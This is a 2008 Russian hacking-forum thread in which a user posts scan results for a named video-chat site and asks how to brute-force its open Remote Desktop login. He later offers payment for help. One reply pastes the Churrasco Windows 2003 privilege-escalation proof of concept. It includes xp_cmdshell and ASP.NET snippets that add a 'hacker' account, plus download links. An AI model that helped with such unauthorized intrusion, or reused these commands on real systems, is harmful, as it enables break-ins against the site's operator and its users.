Америкосы учередили видео чат www.letsvideochat.net а про дыры забыли (смотрим)

Discussion in 'Песочница' started by Spider_Klim, 28 Nov 2008.

  1. Spider_Klim

    Spider_Klim New Member

    Joined:
    15 Jul 2006
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Есть видео чат www.letsvideochat.net.

    Система видновс 2003 сервер.

    Открытые порты:

    порт 80 .
    баги:
    Список cookie
    1. PHPSESSID=80b45d9a61247a56de7adc955edbc009; path=/

    Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:

    /chat.php?c=1227892930


    Список форм

    Обнаружены формы (POST запрос), использующиеся для передачи данных на сервер. В переменных HIDDEN может храниться специфическая или чувствительная информация. Переменные PASSWORD служат для ввода пароля.

    Список форм:

    POST /login1.php HTTP/1.1
    user_name=&user_password=

    POST /register1.php HTTP/1.1
    user_name=&user_pass=&user_cpass=&user_e_mail=&user_city=&user_region=&FilePic=&terms=&user_sex=&user_birthday_month=

    POST /search.php HTTP/1.1
    sex=&age=

    POST /forgot1.php HTTP/1.1
    user_e_mail=

    ........................

    Честно говоря что мне это даёт я не понимаю.


    Но открыт порт:

    Порт 3389

    Запущен сервис удалённого управления компьютером.


    Я подключался.. требует логин и пароль.. скажите какой программой брут подключить.

    Кто желает помочь мне я буду только рад и если хотите принять участие вперёд.
     
  2. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    только эксплойт... брутфорс врятли опможет
     
  3. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    XSpider конечно рулит... ;)

    Держи сплойт:

    Code:
    (From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)
    
    It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) 
    was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
    
    Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows 
    services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes 
    so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide 
    shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
    
    
    -SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
    
    exec xp_cmdshell 'churrasco "net user /add hacker"'
    
    
    -Exploiting IIS 6 with ASP .NET :
    ...
    System.Diagnostics.Process myP = new System.Diagnostics.Process();
    myP.StartInfo.RedirectStandardOutput = true;
    myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
    myP.StartInfo.UseShellExecute = false;
    myP.StartInfo.Arguments= " \"net user /add hacker\" ";
    myP.Start();
    string output = myP.StandardOutput.ReadToEnd();
    Response.Write(output);
    ...
    
    
    You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
    
    backup link: http://milw0rm.com/sploits/2008-Churrasco.zip
    
    Enjoy.
    
    Cesar.
    
    # milw0rm.com [2008-10-08]
     
  4. Spider_Klim

    Spider_Klim New Member

    Joined:
    15 Jul 2006
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Осталось шел халявный найти
     
  5. Spider_Klim

    Spider_Klim New Member

    Joined:
    15 Jul 2006
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Люди я откомпировал експлойт но он запускает у меня..

    Вы конечно меня простите но я просто первый раз это делаю..

    Вы не могли бы мне объяснить что должно произайти.

    что я не так делаю
     
  6. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Для начала воще удали Xspider, потому что он выдаёт всякую хрень.
     
  7. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    +1 ... удали раз и на всегда xspider ...
    он никогда ... никогда тебе не поможет...
     
  8. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    ручками работай ручками
    я вот это нашел
    и вот это

     
    #8 heks, 30 Nov 2008
    Last edited: 30 Nov 2008
  9. Spider_Klim

    Spider_Klim New Member

    Joined:
    15 Jul 2006
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Хорошо удалил помогите с експлойтом..


    Я подключаюсь к порту 3389..

    он выдаёт мне Подключение к удаленному рабочему столу...

    а там логин и пороль а что дальше делать я незнаю..

    ребят кто поможет сразу 250 рублей нащёт на телефон.
     
    #9 Spider_Klim, 30 Nov 2008
    Last edited: 1 Dec 2008